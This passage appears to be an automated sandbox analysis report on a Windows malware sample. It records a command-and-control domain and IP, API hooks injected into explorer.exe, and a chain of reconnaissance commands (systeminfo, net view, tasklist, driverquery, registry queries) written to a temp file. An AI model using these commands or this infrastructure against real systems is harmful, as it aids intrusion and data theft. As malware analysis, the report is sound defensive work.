SHELL32.dll	SHGetSpecialFolderPathA, SHGetSpecialFolderLocation, SHGetMalloc
ole32.dll	CreateBindCtx
CRYPT32.dll	CertDuplicateStore
COMCTL32.dll
pdh.dll	PdhCollectQueryData
AUTHZ.dll	AuthzInitializeResourceManager, AuthzFreeResourceManager

Version Infos

Description	Data
LegalCopyright	AT&T . All rights reserved.
InternalName	Worker
FileVersion	3.2.34.7
CompanyName	AT&T
PrivateBuild	3.2.34.7
LegalTrademarks	AT&T . All rights reserved.
Comments	Nvarchar Anatomicity Cursor Hping Presentation
ProductName	Worker
ProductVersion	3.2.34.7
FileDescription	Nvarchar Anatomicity Cursor Hping Presentation
OriginalFilename	Worker
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 27, 2019 14:40:30.664177895 MESZ	49217	443	192.168.1.82	5.188.60.53
Jun 27, 2019 14:40:30.664243937 MESZ	443	49217	5.188.60.53	192.168.1.82
Jun 27, 2019 14:40:30.664310932 MESZ	49217	443	192.168.1.82	5.188.60.53
Jun 27, 2019 14:40:30.677723885 MESZ	49217	443	192.168.1.82	5.188.60.53
Jun 27, 2019 14:40:30.677813053 MESZ	443	49217	5.188.60.53	192.168.1.82
Jun 27, 2019 14:41:30.676192045 MESZ	49217	443	192.168.1.82	5.188.60.53
Jun 27, 2019 14:41:40.710488081 MESZ	49218	443	192.168.1.82	5.188.60.53
Jun 27, 2019 14:41:40.710549116 MESZ	443	49218	5.188.60.53	192.168.1.82
Jun 27, 2019 14:41:40.710649014 MESZ	49218	443	192.168.1.82	5.188.60.53
Jun 27, 2019 14:41:40.711812973 MESZ	49218	443	192.168.1.82	5.188.60.53
Jun 27, 2019 14:41:40.711837053 MESZ	443	49218	5.188.60.53	192.168.1.82
Jun 27, 2019 14:42:43.925165892 MESZ	49218	443	192.168.1.82	5.188.60.53
Jun 27, 2019 14:45:28.455424070 MESZ	49219	443	192.168.1.82	5.188.60.53
Jun 27, 2019 14:45:28.455466986 MESZ	443	49219	5.188.60.53	192.168.1.82
Jun 27, 2019 14:45:28.455539942 MESZ	49219	443	192.168.1.82	5.188.60.53
Jun 27, 2019 14:45:28.456442118 MESZ	49219	443	192.168.1.82	5.188.60.53
Jun 27, 2019 14:45:28.456466913 MESZ	443	49219	5.188.60.53	192.168.1.82
Jun 27, 2019 14:46:27.800895929 MESZ	49219	443	192.168.1.82	5.188.60.53
Jun 27, 2019 14:46:37.843228102 MESZ	49220	443	192.168.1.82	5.188.60.53
Jun 27, 2019 14:46:37.843271971 MESZ	443	49220	5.188.60.53	192.168.1.82
Jun 27, 2019 14:46:37.844336987 MESZ	49220	443	192.168.1.82	5.188.60.53
Jun 27, 2019 14:46:37.854083061 MESZ	49220	443	192.168.1.82	5.188.60.53
Jun 27, 2019 14:46:37.854146004 MESZ	443	49220	5.188.60.53	192.168.1.82

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 27, 2019 14:40:30.214903116 MESZ	51204	53	192.168.1.82	8.8.8.8
Jun 27, 2019 14:40:30.554101944 MESZ	53	51204	8.8.8.8	192.168.1.82
Jun 27, 2019 14:40:50.641695976 MESZ	51205	53	192.168.1.82	8.8.8.8
Jun 27, 2019 14:40:50.656946898 MESZ	53	51205	8.8.8.8	192.168.1.82
Jun 27, 2019 14:40:50.663505077 MESZ	51206	53	192.168.1.82	8.8.8.8
Jun 27, 2019 14:40:50.676203012 MESZ	53	51206	8.8.8.8	192.168.1.82

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 27, 2019 14:40:30.214903116 MESZ	192.168.1.82	8.8.8.8	0x902e	Standard query (0)	pilodirsob.com	A (IP address)	IN (0x0001)
Jun 27, 2019 14:40:50.641695976 MESZ	192.168.1.82	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Jun 27, 2019 14:40:50.663505077 MESZ	192.168.1.82	8.8.8.8	0x2	Standard query (0)	1.0.0.127.in-addr.arpa	PTR (Pointer record)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 27, 2019 14:40:30.554101944 MESZ	8.8.8.8	192.168.1.82	0x902e	No error (0)	pilodirsob.com		5.188.60.53	A (IP address)	IN (0x0001)
Jun 27, 2019 14:40:50.656946898 MESZ	8.8.8.8	192.168.1.82	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Jun 27, 2019 14:40:50.676203012 MESZ	8.8.8.8	192.168.1.82	0x2	Name error (3)	1.0.0.127.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
CreateProcessW	EAT	explorer.exe
CreateProcessW	INLINE	explorer.exe
CreateProcessA	EAT	explorer.exe
CreateProcessA	INLINE	explorer.exe
CreateProcessAsUserW	EAT	explorer.exe
CreateProcessAsUserW	INLINE	explorer.exe
KERNEL32.dll:CreateProcessW	IAT	explorer.exe

Processes

Process: explorer.exe, Module: kernel32.dll

Function Name	Hook Type	New Data
CreateProcessW	EAT	773C9000
CreateProcessW	INLINE	0xE9 0x9B 0xBC 0xC2 0x29 0x9D
CreateProcessA	EAT	773C9005
CreateProcessA	INLINE	0xE9 0x94 0x44 0x42 0x2A 0xAD
CreateProcessAsUserW	EAT	773C900A
CreateProcessAsUserW	INLINE	0xE9 0x96 0x6E 0xE2 0x2B 0xBD

Process: explorer.exe, Module: USER32.dll

Function Name	Hook Type	New Data
KERNEL32.dll:CreateProcessW	IAT	51BB9C1

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: rb5iJg6pgN.exe PID: 588 Parent PID: 3356

General

Start time:	14:38:30
Start date:	27/06/2019
Path:	C:\Users\user\Desktop\rb5iJg6pgN.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\rb5iJg6pgN.exe'
Imagebase:	0x400000
File size:	1158144 bytes
MD5 hash:	879D9A2C75EE83443A0A913F5DC71B5C
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Embedded_PE, Description: unknown, Source: 00000000.00000000.1467280177.00400000.00000002.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000000.00000001.1467651208.00400000.00000002.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000000.00000002.1499833844.002D0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000000.00000002.1499976703.00400000.00000002.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000000.00000003.1486070629.01620000.00000004.sdmp, Author: unknown
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 2752 Parent PID: 588

General

Start time:	14:38:43
Start date:	27/06/2019
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x70000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Embedded_PE, Description: unknown, Source: 00000002.00000002.1543921572.00060000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000002.00000002.1544091557.00650000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000002.00000002.1544074903.00630000.00000008.sdmp, Author: unknown
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3692 Parent PID: 2752

General

Start time:	14:38:43
Start date:	27/06/2019
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x70000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1499473775.00060000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1499698657.00440000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1501425872.016F0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1502801306.01D30000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1502827811.01D70000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1502842638.01DA0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1502889959.01E00000.00000002.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1502878957.01DF0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1502536161.01A20000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1503029285.02020000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1507679611.02BA0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1507689530.02BC0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1507943848.02D40000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1507950533.02D70000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1507991377.02DE0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1508015150.02E20000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1508035531.02E60000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1508020629.02E30000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1508119677.03020000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1508132762.03080000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1508179226.03130000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1508183860.03140000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1508802180.035F0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1508810634.03600000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1508897767.03AF0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1509255440.03C20000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1510641728.03D80000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1510698102.03E20000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1510826926.03EE0000.00000002.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1510791092.03EB0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1510705859.03E40000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1510762006.03E90000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1510778872.03EA0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1510661452.03DE0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1510834757.03EF0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1510878677.03F70000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1509201484.03B70000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1509319448.03C30000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1510996422.04150000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1511065722.042C0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1516367336.070E0000.00000002.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1509998222.03CC0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1526476296.016F0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1528350249.01D70000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1528282321.01D30000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1529056137.01E00000.00000002.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1528914237.01DF0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1529414366.02020000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1534115502.02BA0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1534129692.02BC0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1534313551.02D40000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1534334049.02D70000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1528641544.01DA0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1534425716.02E20000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1534481919.02E60000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1534585823.03020000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1534437822.02E30000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1534605501.03080000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1534672142.03130000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1534679802.03140000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1524597638.00440000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1524475486.00060000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1514376422.05310000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1535904797.03AF0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1534388387.02DE0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1536709172.03D80000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1536750248.03E20000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1535812569.035F0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1536757874.03E40000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1536809625.03EB0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1536825861.03EE0000.00000002.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1536800241.03EA0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1536870913.03F70000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1527805844.01A20000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1537045293.042C0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1536075349.03C30000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1536732103.03DE0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1536026873.03C20000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1535821910.03600000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1536791257.03E90000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1535957747.03B70000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1536833113.03EF0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1538556444.05310000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1536262211.03CC0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000003.00000000.1540736146.070E0000.00000002.sdmp, Author: unknown
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 2764 Parent PID: 3692

General

Start time:	14:39:43
Start date:	27/06/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C 'systeminfo.exe > C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Imagebase:	0x4abd0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: systeminfo.exe PID: 3856 Parent PID: 2764

General

Start time:	14:39:43
Start date:	27/06/2019
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo.exe
Imagebase:	0x320000
File size:	75776 bytes
MD5 hash:	258B2ED54FC7F74E2FDCCE5861549C1A
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Embedded_PE, Description: unknown, Source: 00000006.00000002.1659326612.001E0000.00000008.sdmp, Author: unknown
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 324 Parent PID: 3692

General

Start time:	14:39:53
Start date:	27/06/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Imagebase:	0x4a490000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3840 Parent PID: 3692

General

Start time:	14:39:53
Start date:	27/06/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C 'net view >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Imagebase:	0x4aa40000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: net.exe PID: 3956 Parent PID: 3840

General

Start time:	14:39:53
Start date:	27/06/2019
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net view
Imagebase:	0x6c0000
File size:	46080 bytes
MD5 hash:	B9A4DAC2192FD78CDA097BFA79F6E7B2
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Embedded_PE, Description: unknown, Source: 0000000E.00000002.1686373712.000D0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 0000000E.00000002.1686572361.00470000.00000008.sdmp, Author: unknown
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3996 Parent PID: 3692

General

Start time:	14:40:03
Start date:	27/06/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Imagebase:	0x4a470000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 1164 Parent PID: 3692

General

Start time:	14:40:04
Start date:	27/06/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C 'nslookup 127.0.0.1 >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Imagebase:	0x4ac40000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: nslookup.exe PID: 3752 Parent PID: 1164

General

Start time:	14:40:04
Start date:	27/06/2019
Path:	C:\Windows\System32\nslookup.exe
Wow64 process (32bit):	false
Commandline:	nslookup 127.0.0.1
Imagebase:	0x5e0000
File size:	98304 bytes
MD5 hash:	5E3830EE3282A53920E00784FEC44CFD
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3896 Parent PID: 3692

General

Start time:	14:40:05
Start date:	27/06/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Imagebase:	0x4a2b0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 1600 Parent PID: 3692

General

Start time:	14:40:05
Start date:	27/06/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C 'tasklist.exe /SVC >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Imagebase:	0x49fe0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: tasklist.exe PID: 1968 Parent PID: 1600

General

Start time:	14:40:05
Start date:	27/06/2019
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist.exe /SVC
Imagebase:	0x990000
File size:	80896 bytes
MD5 hash:	A9A00E71E3DD67B029FC904FE3BB61DA
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Embedded_PE, Description: unknown, Source: 00000018.00000002.1694019901.000D0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000018.00000002.1694247399.00640000.00000008.sdmp, Author: unknown
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 4032 Parent PID: 3692

General

Start time:	14:40:07
Start date:	27/06/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Imagebase:	0x4a310000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3576 Parent PID: 3692

General

Start time:	14:40:07
Start date:	27/06/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C 'driverquery.exe >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Imagebase:	0x4a480000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: driverquery.exe PID: 2012 Parent PID: 3576

General

Start time:	14:40:07
Start date:	27/06/2019
Path:	C:\Windows\System32\driverquery.exe
Wow64 process (32bit):	false
Commandline:	driverquery.exe
Imagebase:	0x850000
File size:	66048 bytes
MD5 hash:	5D1CFD8CF86F05BB27926C9A6893B635
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Embedded_PE, Description: unknown, Source: 0000001D.00000002.1710546118.001A0000.00000008.sdmp, Author: unknown
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3928 Parent PID: 3692

General

Start time:	14:40:14
Start date:	27/06/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Imagebase:	0x4a150000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 2496 Parent PID: 3692

General

Start time:	14:40:14
Start date:	27/06/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C 'reg.exe query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall' /s >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Imagebase:	0x4a1f0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: reg.exe PID: 1668 Parent PID: 2496

General

Start time:	14:40:15
Start date:	27/06/2019
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg.exe query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall' /s
Imagebase:	0xc50000
File size:	62464 bytes
MD5 hash:	D69A9ABBB0D795F21995C2F48C1EB560
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Embedded_PE, Description: unknown, Source: 00000022.00000002.1734565185.000D0000.00000008.sdmp, Author: unknown
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3120 Parent PID: 3692

General

Start time:	14:40:24
Start date:	27/06/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Imagebase:	0x4a260000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 608 Parent PID: 3692

General

Start time:	14:40:24
Start date:	27/06/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C 'reg.exe query 'HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall' /s >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Imagebase:	0x4a290000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: reg.exe PID: 3524 Parent PID: 608

General

Start time:	14:40:24
Start date:	27/06/2019
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg.exe query 'HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall' /s
Imagebase:	0x530000
File size:	62464 bytes
MD5 hash:	D69A9ABBB0D795F21995C2F48C1EB560
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Embedded_PE, Description: unknown, Source: 00000027.00000002.1736596250.000D0000.00000008.sdmp, Author: unknown
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 812 Parent PID: 3692

General

Start time:	14:40:25
Start date:	27/06/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1'
Imagebase:	0x4a930000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rb5iJg6pgN.exe PID: 588 Parent PID: 3356 rb5iJg6pgN.exeCOMMON

Execution Graph

Execution Coverage:	30.9%
Dynamic/Decrypted Code Coverage:	9.8%
Signature Coverage:	26.7%
Total number of Nodes:	491
Total number of Limit Nodes:	10

Executed Functions

Function 004060FB, Relevance: 217.2, APIs: 108, Strings: 15, Instructions: 1968
windowencryptionmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 62%

			E004060FB(void* __fp0) {
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HDC__* _t639;
				signed int _t663;
				signed int _t671;
				signed int _t696;
				signed int _t699;
				struct HWND__* _t707;
				signed int _t710;
				struct HDC__* _t726;
				struct HDC__* _t727;
				struct HDC__* _t733;
				signed int _t737;
				void* _t738;
				signed int _t741;
				struct HDC__* _t746;
				struct HWND__* _t748;
				signed int _t750;
				signed short _t755;
				signed int _t768;
				long _t771;
				struct HDC__* _t790;
				signed short _t796;
				signed int _t801;
				signed int _t817;
				signed int _t824;
				signed short _t825;
				intOrPtr _t826;
				void* _t827;
				signed int _t833;
				struct HDC__* _t838;
				int _t841;
				struct HDC__* _t846;
				signed char _t855;
				void* _t859;
				struct HDC__* _t862;
